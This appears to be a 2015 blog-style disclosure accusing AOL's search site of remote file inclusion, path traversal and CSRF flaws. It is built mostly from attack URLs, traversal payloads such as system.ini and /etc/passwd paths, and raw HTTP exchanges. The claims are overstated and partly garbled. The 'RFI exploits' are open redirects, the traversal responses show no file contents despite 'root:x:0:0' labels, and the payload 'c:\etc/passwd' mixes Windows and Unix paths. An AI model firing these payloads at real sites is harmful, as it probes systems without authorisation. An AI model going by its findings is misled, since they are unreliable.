@AOL REMOTE FILE INCLUSION aka RFI / Path TRANSVERSAL / URL Redirect (& More...) ;)

AOL Remote File Inclusion/Path Transversal/URL Redirect (& More...)
***************************************************************

Time-Line vulnerability




-Multiples Security Advisories

BUT THE VENDOR
NEVER RESPONSE

I don´t Belive It.. Common sense does not exist OR They are very pushy






I. VULNERABILITY
********************

#Title: AOL Remote File Inclusion / Path Transversal / CRSF and More

#Vendor:http://www.aol.com

#Author: @Lord0fTheWar (@HabemusCurso Security Trainner / Red Teamer )

#Red Teams Trainer http://habemuscurso.blogspot.com





II. BRIEF DESCRIPTION
****************************

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers,publishers, and advertisers.

Founded in 1983 as Control Video Corporation, an online services company by Jim Kimsey from the remnants of Control Video Corporation, AOL has franchised its services to companies in several nations around the world or to set up international versions of its 

services.AOL is headquartered at 770 Broadway in New York.. 


                                   



REMOTE FILE INCLUSIÓN aka RFI
***************************************


Risk: High

Confidence  Medium

Parameter: s_cu

CWE id: 98

WASC id: 5





Description
**************


Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications.


When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, 
the web application might be tricked into including remote files with malicious code.

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code
into separate files that are later referenced by main application modules.

When a web application references an include file,the code in this file may be executed implicitly or explicitly by calling specific procedures. 

If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:


 * Running malicious code on the server: any code in the included malicious files will be run by the server.
If the file include is not executed using some wrapper, code in include 
files is executed in the context of the server user. 
This could lead to a complete system compromise.



 * Running malicious code on clients: the attacker's malicious code can manipulate 
the content of the response sent to the client. 
The attacker can embed malicious code in the 
response that will be run by the client
(for example, Javascript to steal the client session cookies).


PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" 
in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.






PROOF OF CONCEPT
*************************



                                                                                                                                                                                                                                                                                    |
         # # # #  # # 
        #                                                                          
        #                                                         
         # #  #        # # # # # #       # # # # # # #             
                 #     #                      #
                #     # #######       #                                                                                                       
              #      # #######       #
             #      #                     #
   # # # #       #  # # # # #      # # # # # #  #     



This FIRST EXPLOIT is dedicated to the person who was 

My Sec trainer and Friend and we've been together 17 years ... 

                              And today    

Thisfriendship Continuous     ;) Thanks You For All MaSter    





FIRST EXPLOIT
****************


 http://search.aol.com/aol/setprefsr?queryautocomppref=1&s_cm=content_searchsuggestion&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Fwww.youtube.com/watch?v=GC04S7rbhvI#t=4499      


SECOND EXPLOT
********************


http://search.aol.com/aol/setprefsr?s_cm=settings&sp_rl=1&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Fhabemuscurso.blogspot.com%2F&openInNewWindowPref=true



THIRD EXPLOIT
*****************


http://search.aol.com/aol/setprefsr?queryautocomppref=1&s_cm=content_searchsuggestion&src=PREFS&s_cd=prefRedir&s_cu=http%3A%2F%2Ftwitter.com/lord0fthewar%2F&sp_qs=1




FOURTH EXPLOIT
*******************


http://search.aol.com/aol/setprefsr?s_cm=settings&src=PREFS&safesearch=4&s_cd=prefRedir&sp_ss=1&s_cu=http://habemuscurso.blogspot.com.es/2015/05/alert-you-must-have-common-sense.html








PATH TRANSVERSAL
***********************




Risk : High

Confidence : Medium

Parameter : q

Attack: [drivers]

CWE id: 22

WASC id: 33




Description
**************



The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside

the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. A
ny device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.

Most web sites restrict user access to a specific portion of the file-system, 
typically called the "web document root" or "CGI root" directory. 
These directories contain the files intended for user access and t
he executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, 
Path Traversal attacks will utilize the ability of special-characters sequences.

The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource 
location requested in the URL. Although most popular web servers will prevent this technique from 
escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding
("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\")
 on Windows-based servers, URL encoded characters "%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.

Even if the web server properly restricts Path Traversal attempts in the URL path, a web application
 itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem 
of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is 
substituted with the file name of one of the web application's dynamic scripts. Consequently, 
the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot 
(".") to reveal the listing of the current working directory, or "" NULL characters in order to bypass rudimentary file extension checks.




PROOF OF CONCEPT
----------------------


Path Transversal 10

1


Risk:High

Confidence:Medium

Parameter: as_rq

Attack: [drivers]

CWE id 22

WASC id 33



http://search.aol.com/aol/search?as_rq=c%3A%5CWindows%5Csystem.ini&s_it=advancedSearch&btnG=Search&v_t=errordocument_404  HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/advanced?v_t=errordocument_404
Host: search.aol.com


Response:


HTTP/1.1 200 OK

Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-2629034018615354918
Set-Cookie: s_guid="ee6dc9ef3eaa42a8a43af632384c14fb:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: MVT_TBP=f1|858|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: MVT_TBV=f1|171; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|858|20150513|20150513|SLclicktxtOff:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:56:44 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 19:10:51 GMT
Set-Cookie: ie6Promotion_start_time=1431532604506; Expires=Mon, 31-May-2083 19:10:51 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




2


Risk:High

Confidence:Medium

Parameter: as_rq

Attack: [drivers]

CWE id 22

WASC id 33


http://search.aol.com/aol/search?as_rq=c%3A%5CWindows%5Csystem.ini&s_it=advancedSearch&btnG=Search&v_t=na&oreq=5d12c591a00f4f3bb9ef6fbdd8b8b885 HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/settings?oreq=704c2df02ed94266af0023622359d55c&v_t=na
Host: search.aol.com


Response



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 17:15:44 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-310996711283562025
Set-Cookie: s_guid="58d537cbe21444989dcbcd4791417d58:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: MVT_TBP=f1|59|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: MVT_TBV=f1|1; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|59|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 17:15:44 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:29:52 GMT
Set-Cookie: ie6Promotion_start_time=1431537345018; Expires=Mon, 31-May-2083 20:29:52 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




3

Risk:High

Confidence:Medium

Parameter: q

Attack: [drivers]

CWE id 22

WASC id 33


http://search.aol.com/aol/search?q=c%3A%5CWindows%5Csystem.ini&s_it=botm_relsearch&s_cs=9190864025906731353&v_t=na HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?q=Lordothewar&s_it=searchbox.webhome&v_t=na
Host: search.aol.com



Response



HTTP/1.1 200 OK
Date: Wed, 13 May 2015 16:06:28 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=9190864025906731353
Set-Cookie: s_guid="9dd06d2ce5504c4d877140b3c081cfe9:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Set-Cookie: MVT_TBP=f1|909|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Set-Cookie: MVT_TBV=f1|489; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|909|20150513|20150513|SLclicktxtOff:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:06:28 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-U




4


Risk:High

Confidence:Medium

Parameter: q

Attack: [Drivers]

CWE id 22

WASC id 33


http://search.aol.com/aol/search?q=c%3A%5CWindows%5Csystem.ini&s_it=searchtabs&v_t=na HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/tracking?d_ch=en_US_search&q=%7BsearchTerms%7D&s_ch=en_US_network&s_it=searchtabs&v_t=na
Host: search.aol.com




Response


HTTP/1.1 200 OK

Date: Wed, 13 May 2015 15:43:01 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=3685746043036587394
Set-Cookie: s_guid="0fb8527bb84a413cbede2ece2fc75304:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: MVT_TBP=f1|618|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: MVT_TBV=f1|831; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|618|20150513|20150513|SLclicktxtOff_CNTL2:1+Ggray_CNTL2:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:43:01 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 18:57:08 GMT
Set-Cookie: ie6Promotion_start_time=1431531781160; Expires=Mon, 31-May-2083 18:57:08 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US






5

Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33


http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=opensearch HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/assets/en/US/aolcom/0860zaolr06/opensearch.xml
Host: search.aol.com



HTTP/1.1 200 OK
Date: Wed, 13 May 2015 15:44:18 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-995681965050725470
Set-Cookie: s_guid="e8ab8fb75f0b493982fe3186dc6e0f52:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: MVT_TBP=f1|9|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: MVT_TBV=f1|158; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|9|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:44:18 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 18:58:25 GMT
Set-Cookie: ie6Promotion_start_time=1431531858597; Expires=Mon, 31-May-2083 18:58:25 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US




6


Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33



HTTP/1.1 200 OK
Date: Wed, 13 May 2015 16:55:50 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=1894788125986043588
Set-Cookie: s_guid="db2f65f7bfa2491085a63b2f6f6278f2:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: MVT_TBP=f1|467|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: MVT_TBV=f1|954; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|467|20150513|20150513|SLclicktxtOff_CNTL1:1+Ggray_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:55:50 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:09:57 GMT
Set-Cookie: ie6Promotion_start_time=1431536150237; Expires=Mon, 31-May-2083 20:09:57 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





7

Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33


http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=opensearch&v_t=na&oreq=f5d42ea2baa548c08c5f03d13dc91b7d&page=2 HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?amp;s_it=opensearch&q=%7BsearchTerms%7D
Host: search.aol.com




Response:



HTTP/1.1 200 OK
Date: Wed, 13 May 2015 16:09:54 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=3691178351082888093
Set-Cookie: s_guid="db513787f6fc4b4ebbea4cd527103f38:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Set-Cookie: MVT_TBP=f1|163|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Set-Cookie: MVT_TBV=f1|160; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|163|20150513|20150513|csa_web_slinkon_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:09:54 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





8


Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33

http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=channel_redir_fail HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/tracking
Host: search.aol.com




Response:


HTTP/1.1 200 OK
Date: Wed, 13 May 2015 15:58:04 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-8989857396616909336
Set-Cookie: s_guid="6eee3cb53dce47a28cd5b8367071d70f:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:58:04 GMT; Path=/
Set-Cookie: MVT_TBP=f1|43|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 15:58:04 GMT; Path=/
Set-Cookie: MVT_TBV=f1|400; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|43|20150513|20150513|csa_web_slinkhcsl:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 15:58:05 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 19:12:12 GMT
Set-Cookie: ie6Promotion_start_time=1431532685069; Expires=Mon, 31-May-2083 19:12:12 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





9

Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33


 http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=searchbox.webhome&v_t=na&oreq=1f374aa083034aa58588b5b21cd39f7f HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/settings?oreq=8c258a7646f6467b89d55243f86e5a19&v_t=na
Host: search.aol.com


Response:


HTTP/1.1 200 OK
Date: Wed, 13 May 2015 16:52:51 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=1387484737994812305
Set-Cookie: s_guid="ddaaef58005b44d5b5a3560642b6b722:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: MVT_TBP=f1|118|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: MVT_TBV=f1|38; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|118|20150513|20150513|csa_web_slinkon_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:06:58 GMT
Set-Cookie: ie6Promotion_start_time=1431535971448; Expires=Mon, 31-May-2083 20:06:58 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





10


Risk:High

Confidence:Medium

Parameter: q

Attack: root:x:0:0

CWE id 22

WASC id 33


http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=searchbox.webhome&v_t=na&oreq=8c258a7646f6467b89d55243f86e5a19&page=2 HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?q=ZAP&s_it=searchbox.webhome&v_t=na
Host: search.aol.com




Response:


HTTP/1.1 200 OK
Date: Wed, 13 May 2015 16:07:05 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-8531884303794427980
Set-Cookie: s_guid="6681a6e5652646639ecdb70564f84a78:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Set-Cookie: MVT_TBP=f1|562|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Set-Cookie: MVT_TBV=f1|222; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|562|20150513|20150513|SLclicktxtOff_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





CSRF X-FRAME OPTIONS HEADER NOT SET (5065)
***********************************************


Risk: Medium

Confidence: Medium


Solution:

Most modern Web browsers support the X-Frame-Options HTTP header.
Ensure it's set on all web pages returned by your site 

If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then 
you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY.  

ALLOW-FROM allows specific websites to frame the web page in supported web browsers



Only Two Examples ( Too Much == 5065 )




PROOF OF CONCEPT
***********************

1

 http://asvcs.aol.com/sn_sync.html HTTP/1.1




Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: s_pers=%20s_fid%3D49A28934042265F6-144A9301083E75C3%7C1494680903186%3B%20s_getnr%3D1431522503194-Repeat%7C1494594503194%3B%20s_nrgvo%3DRepeat%7C1494594503196%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; 

